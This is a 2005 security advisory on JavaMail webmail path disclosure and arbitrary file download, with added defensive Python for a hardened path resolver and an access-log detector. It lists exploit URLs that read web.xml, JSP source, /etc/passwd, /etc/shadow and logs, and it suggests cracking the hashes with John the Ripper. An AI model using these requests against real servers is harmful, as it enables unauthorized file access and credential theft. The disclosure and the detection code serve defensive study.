Javamail Multiple Information Disclosure Vulnerabilities
May 25, 2005
Yangon, Myanmar

Vulnerable Systems:
 * JavaMail API 1.3
 * JavaMail API 1.2
 * JavaMail API 1.1.3

Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows

Description:

ReadMessage.jsp fails to restrict access to other directories and files. The attachment link it renders is built from a server-side path:

    File Name: <%=mp.getFileName()%>
    Type: <%=abc.getContent_Type()%>
    Size: <%=abc.getMsgSize()/1024%>Kb
    <%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download

Because the link is simply getFilePath() + "/" + abc.getFileName(), the full server-side path of the attachment is handed to the client, and the download handler serves whatever path is sent back. This will give an attacker any file on the system.

Impact:
 1. Open specific mailbox attachment
 2. Download .jsp source code and configuration information of javamail
 3. Target machine Root/Admin Compromise
 4. Download server information

1. Open specific mailbox attachment

When a user downloads a message attachment from the Javamail webmail, the attacker may notice the URL:

    http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension

The URL points into the /var folders, so switching folders was tried:

    http://example.com/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user

That gave errors. Finally, reaching this URL

    http://example.com/mailboxesdir/user@example.com/

produced a listing of the attachments of user@example.com. Even unauthorized users are able to view a specific mailbox's attachments; the attacker only needs to know the username in order to get the attachment listing:

    http://example.com/mailboxesdir/user2@example.com/
    http://example.com/mailboxesdir/user3@example.com/

2. Download configuration information of javamail

docdownloadfile.jsp redirects to the location of the file on the server, taken from the parameter f. The web browser actually receives the redirect target:

    http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension

This information leads to web.xml, which gives the configuration information of javamail:

    http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml

Download the source code of the jsp files:

    http://example.com/Download?/var/serviceprovider/web/login.jsp
    http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
    http://example.com/Download?/var/serviceprovider/web/addbook.jsp
    http://example.com/Download?/var/serviceprovider/web/compose.jsp
    http://example.com/Download?/var/serviceprovider/web/folder.jsp
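Added example, not code from the advisory or from JavaMail: the root cause described above is a download handler that accepts a server-side path from the client and serves it. The Python below shows that vulnerable resolution next to a hardened resolver that takes only a message id and a filename, derives the mailbox from the authenticated session user, rejects separator and ".." components, and checks the canonicalized result against the user's mailbox root (the same check a JSP would make with java.io.File.getCanonicalPath()). The directory layout, the user name, the function names and the temporary tree built by demo() are constructed for the example.

```python
import os
import shutil
import tempfile


class AccessDenied(Exception):
    """Raised when a requested attachment path leaves the user's mailbox."""


def vulnerable_resolve(f_param: str) -> str:
    """The advisory's pattern: the 'f' parameter is a server path and is used as-is."""
    return f_param


def safe_resolve(mailboxes_dir: str, session_user: str, message_id: str, filename: str) -> str:
    """Resolve an attachment path that is guaranteed to stay inside the
    session user's own mailbox directory.

    - The client never supplies a filesystem path, only a message id and a filename.
    - Each component is rejected if it is empty, '.', '..', or contains a separator or NUL.
    - The final path is canonicalized (symlinks resolved) and must still be under
      the user's mailbox root; commonpath also defeats prefix tricks such as
      '<mailboxes>/alice-evil' matching a naive startswith('<mailboxes>/alice').
    """
    for part in (session_user, message_id, filename):
        if not part or part in (".", "..") or "/" in part or "\\" in part or "\x00" in part:
            raise AccessDenied(f"bad path component: {part!r}")
    user_root = os.path.realpath(os.path.join(mailboxes_dir, session_user))
    candidate = os.path.realpath(os.path.join(user_root, message_id, filename))
    if os.path.commonpath([user_root, candidate]) != user_root:
        raise AccessDenied("path escapes the mailbox directory")
    return candidate


def demo() -> dict:
    """Build a constructed mailbox tree in a temp dir and exercise both resolvers.

    Layout mirrors the advisory's paths: <root>/mailboxesdir/<user>/<message-id>/<file>
    plus a <root>/WEB-INF/web.xml that must never be downloadable.
    """
    root = tempfile.mkdtemp()
    try:
        mailboxes = os.path.join(root, "mailboxesdir")
        msg1 = os.path.join(mailboxes, "alice@example.com", "msg1")
        os.makedirs(msg1)
        os.makedirs(os.path.join(root, "WEB-INF"))
        with open(os.path.join(msg1, "report.pdf"), "w") as fh:
            fh.write("attachment")
        with open(os.path.join(root, "WEB-INF", "web.xml"), "w") as fh:
            fh.write("<web-app/>")
        # A symlink planted inside the mailbox that points outside it.
        os.symlink(os.path.join(root, "WEB-INF"),
                   os.path.join(mailboxes, "alice@example.com", "msg2"))

        results = {}
        # Vulnerable: whatever path the client names is what gets served.
        results["vuln_webxml"] = vulnerable_resolve(os.path.join(root, "WEB-INF", "web.xml"))
        # Safe: the legitimate attachment resolves inside the user's mailbox.
        results["ok"] = safe_resolve(mailboxes, "alice@example.com", "msg1", "report.pdf")
        # Safe: '..' in a component is rejected before the filesystem is touched.
        try:
            safe_resolve(mailboxes, "alice@example.com", "..", "web.xml")
            results["dotdot"] = "served"
        except AccessDenied:
            results["dotdot"] = "denied"
        # Safe: the symlink escape is caught by canonicalization.
        try:
            safe_resolve(mailboxes, "alice@example.com", "msg2", "web.xml")
            results["symlink"] = "served"
        except AccessDenied:
            results["symlink"] = "denied"
        return results
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the hardened version is that the client-controlled part of the request is never a path: the mailbox comes from the session, the two remaining components are validated as single path segments, and the canonicalized result is checked again so that a symlink left inside a mailbox cannot redirect the download elsewhere.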
3. Target machine Root/Admin Compromise

On UNIX, /etc/passwd and /etc/shadow are important files. Out of a little curiosity, the following was typed into the web browser:

    http://example.com/Download?/etc/passwd

An example of such a password file is:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh

Then crack the Unix password files with John the Ripper. John can be found practically anywhere; for example, try going to altavista.com and running a search for 'john the ripper'.

    http://example.com/Download?/etc/shadow

    root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
    adm:*:133334:0:22222:7:::
    ftp:*:133334:0:2222:7:::

    http://example.com/Download?/etc/group

/etc/group file:

    root:x:0:
    daemon:x:1:
    bin:x:2:
    sys:x:3:
    adm:x:4:
    tty:x:5:
    disk:x:6:
    lp:x:7:lp
    mail:x:8:
    news:x:9:
    uucp:x:10:
    proxy:x:13:

Once the attacker has the root/admin user information of the target server, any further attack follows. The attacker may do website defacement, database alteration, data theft and more.

4. Download server information

    http://example.com/Download?/var/log/boot.log
    http://example.com/Download?/var/log/maillog

And more can be done....

By Thet Aung Min Latt
thetaung@gmail.com
http://thetaung.amyanmar.com
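Every request in the advisory passes through the servlet container's access log, so the abuse is detectable after the fact. The following added example (not part of the advisory) parses constructed common-log-format lines modelled on the URLs above, decodes and normalizes the path named by /Download or by the f parameter of docdownloadfile.jsp, and flags any request that reaches outside the mailbox directory or that lists a mailbox directly. The log lines, the IP addresses and the MAILBOXES_DIR value are constructed or assumed from the advisory's URLs.

```python
import posixpath
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access-log lines (common log format) modelled on the advisory's URLs.
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2005:10:01:02 +0630] "GET /docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/report.pdf HTTP/1.1" 302 0
10.0.0.5 - - [25/May/2005:10:01:03 +0630] "GET /Download?/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/report.pdf HTTP/1.1" 200 5120
10.0.0.9 - - [25/May/2005:10:05:44 +0630] "GET /Download?/var/serviceprovider/web/WEB-INF/web.xml HTTP/1.1" 200 2048
10.0.0.9 - - [25/May/2005:10:05:50 +0630] "GET /Download?/etc/passwd HTTP/1.1" 200 1410
10.0.0.9 - - [25/May/2005:10:06:01 +0630] "GET /Download?%2Fetc%2Fshadow HTTP/1.1" 200 980
10.0.0.9 - - [25/May/2005:10:06:30 +0630] "GET /mailboxesdir/user2@example.com/ HTTP/1.1" 200 3300
10.0.0.9 - - [25/May/2005:10:06:31 +0630] "GET /Download?/var/serviceprovider/web/mailboxesdir/user@example.com/../../WEB-INF/web.xml HTTP/1.1" 200 2048
10.0.0.7 - - [25/May/2005:10:07:00 +0630] "GET /login.jsp HTTP/1.1" 200 1200
"""

# Assumed from the advisory's URLs: the only directory a download may legitimately come from.
MAILBOXES_DIR = "/var/serviceprovider/web/mailboxesdir"

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)


def requested_path(target: str):
    """Return the server-side path a download request names, or None when the
    request is not a download request. Handles both endpoints seen in the advisory:
    docdownloadfile.jsp?f=<path> and the redirect target Download?<path>."""
    path, _, query = target.partition("?")
    if path == "/docdownloadfile.jsp":
        for kv in query.split("&"):
            key, _, value = kv.partition("=")
            if key == "f":
                return unquote(value)
        return None
    if path == "/Download":
        return unquote(query)
    return None


def classify(line: str):
    """Return (ip, reason, detail) for a suspicious request, else None."""
    m = CLF_RE.match(line.rstrip("\n"))
    if not m:
        return None
    target = m.group("target")
    path = target.partition("?")[0]
    # Direct listing of a mailbox directory, which should never be served.
    if path.startswith("/mailboxesdir/"):
        return (m.group("ip"), "mailbox-listing", target)
    requested = requested_path(target)
    if requested is None:
        return None
    # Percent-decoding and normalization collapse '..' before the prefix check,
    # so encoded and traversal variants are caught alike.
    norm = posixpath.normpath(requested)
    if not norm.startswith(MAILBOXES_DIR + "/"):
        return (m.group("ip"), "download-outside-mailboxes", norm)
    return None


def scan(log_text: str):
    """All suspicious requests in a log, in order of appearance."""
    return [alert for alert in (classify(line) for line in log_text.splitlines()) if alert]


def offenders(log_text: str) -> Counter:
    """Number of suspicious requests per client address."""
    return Counter(alert[0] for alert in scan(log_text))


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
    print(offenders(SAMPLE_LOG))
```

Run against the constructed log, the legitimate attachment download (lines 1 and 2) passes, while the WEB-INF, /etc and traversal requests and the mailbox listing are all attributed to the same client address; the same prefix check is what the application itself should have enforced before serving the file.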